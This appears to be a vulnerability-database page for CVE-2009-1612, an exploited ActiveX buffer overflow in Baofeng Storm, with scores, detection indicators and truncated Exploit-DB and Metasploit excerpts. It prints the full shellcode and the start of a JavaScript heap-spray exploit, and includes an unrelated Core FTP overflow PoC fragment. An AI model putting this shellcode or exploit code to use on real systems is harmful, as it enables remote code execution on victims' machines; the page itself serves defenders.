CVE-2009-1612
published 2009-05-11CVE-2009-1612: Stack-based buffer overflow in the MPS.StormPlayer.1 ActiveX control in mps.dll 3.9.4.27 in Baofeng Storm allows remote attackers to execute arbitrary code via…
PriorityP266critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
33.26%
98.2th percentile
Stack-based buffer overflow in the MPS.StormPlayer.1 ActiveX control in mps.dll 3.9.4.27 in Baofeng Storm allows remote attackers to execute arbitrary code via a long argument to the OnBeforeVideoDownload method, as exploited in the wild in April and May 2009. NOTE: some of these details are obtained from third party information. NOTE: it was later reported that 3.09.04.17 and earlier are also affected.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| baofeng | storm | — | — |
| baofeng | storm | — | — |
| baofeng | storm | — | — |
| baofeng | storm | — | — |
| baofeng | storm | — | — |
| baofeng | storm | — | — |
| baofeng | storm | — | — |
| baofeng | storm | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063
- →Detect instantiation of the vulnerable ActiveX control by its ProgID 'MPS.StormPlayer.1' or CLSID '6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB' in HTML/JavaScript, which is the attack vector for this exploit. ↗
- →Monitor for overly long string arguments passed to the 'OnBeforeVideoDownload' method of the MPS.StormPlayer.1 ActiveX control; a stack-based buffer overflow is triggered by this oversized argument. ↗
- →The exploit uses a heap spray targeting address 0x0c0c0c0c with a 0x40000-byte spray block; detect this characteristic heap spray pattern in browser memory or JavaScript. ↗
- →Look for the NOP sled pattern '%u9090%u9090' used as heap spray padding in JavaScript exploiting this vulnerability. ↗
- →The exploit payload uses 'calc.exe' (shellcode ends with %u63E7%u6C61%u0063) as a proof-of-concept; in-the-wild variants will substitute this with malicious shellcode in the same unescape() string. ↗
- ·Affected versions include mps.dll 3.9.4.27 and lower, as well as 3.09.04.17 and earlier per later reports; the Metasploit module targets Windows XP SP0-SP3 and Windows Vista with IE 6.0 SP0-SP2 and IE 7, but notes these targets are untested. ↗
- ·The Metasploit module's return address ('Ret') field is empty for the sole target, indicating the ROP/return gadget was not populated and the module may require additional configuration to be fully functional. ↗
- ·The exploit was observed in the wild in April and May 2009; later reporting extended the affected version range beyond the initially disclosed 3.9.4.27. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2fq7-v233-xx5v: Stack-based buffer overflow in the MPS
ghsa_unreviewed·2022-05-02
CVE-2009-1612 [HIGH] CWE-119 GHSA-2fq7-v233-xx5v: Stack-based buffer overflow in the MPS
Stack-based buffer overflow in the MPS.StormPlayer.1 ActiveX control in mps.dll 3.9.4.27 in Baofeng Storm allows remote attackers to execute arbitrary code via a long argument to the OnBeforeVideoDownload method, as exploited in the wild in April and May 2009. NOTE: some of these details are obtained from third party information. NOTE: it was later reported that 3.09.04.17 and earlier are also affected.
VulnCheck
baofeng storm Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2009·CVSS 9.3
CVE-2009-1612 [CRITICAL] baofeng storm Improper Restriction of Operations within the Bounds of a Memory Buffer
baofeng storm Improper Restriction of Operations within the Bounds of a Memory Buffer
Stack-based buffer overflow in the MPS.StormPlayer.1 ActiveX control in mps.dll 3.9.4.27 in Baofeng Storm allows remote attackers to execute arbitrary code via a long argument to the OnBeforeVideoDownload method, as exploited in the wild in April and May 2009. NOTE: some of these details are obtained from third party information. NOTE: it was later reported that 3.09.04.17 and earlier are also affected.
Affected: baofeng storm
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2009-1612; https://www.cve.org/CVERecord?id=CVE-2009-1612
No detection rules found.
Exploit-DB
BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2009-1612 BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)
BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)
---
##
# $Id: baofeng_storm_onbeforevideodownload.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX
control. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing
an overly long string to the method "OnBeforeVideoDownload" an attacker
Exploit-DB
Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)
exploitdb·2009-09-25
CVE-2009-3484 Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)
Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)
---
#!/usr/bin/env python
####################################################################################
#
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Notes: Most likely other versions are vulnerable too.
# Usage: File, Quick Connect, Paste into Hostname, Connect
#
####################################################################################
# Register Dump on XPSP3
"""
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE "AAAAAAAAAAA
Exploit-DB
BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow
exploitdb·2009-04-30
CVE-2009-1612 BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow
BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow
---
#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL : mps.dll
# Problem Func : OnBeforeVideoDownload()
function test()
{
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (
Metasploit
BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
metasploit
BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX control. Versions of mps.dll including 3.9.4.27 and lower are affected. When passing an overly long string to the method "OnBeforeVideoDownload" an attacker can execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/34944http://www.cisrt.org/enblog/read.php?245http://www.securityfocus.com/bid/34789https://www.exploit-db.com/exploits/8579http://secunia.com/advisories/34944http://www.cisrt.org/enblog/read.php?245http://www.securityfocus.com/bid/34789https://www.exploit-db.com/exploits/8579
2009-05-11
Published
Exploited in the wild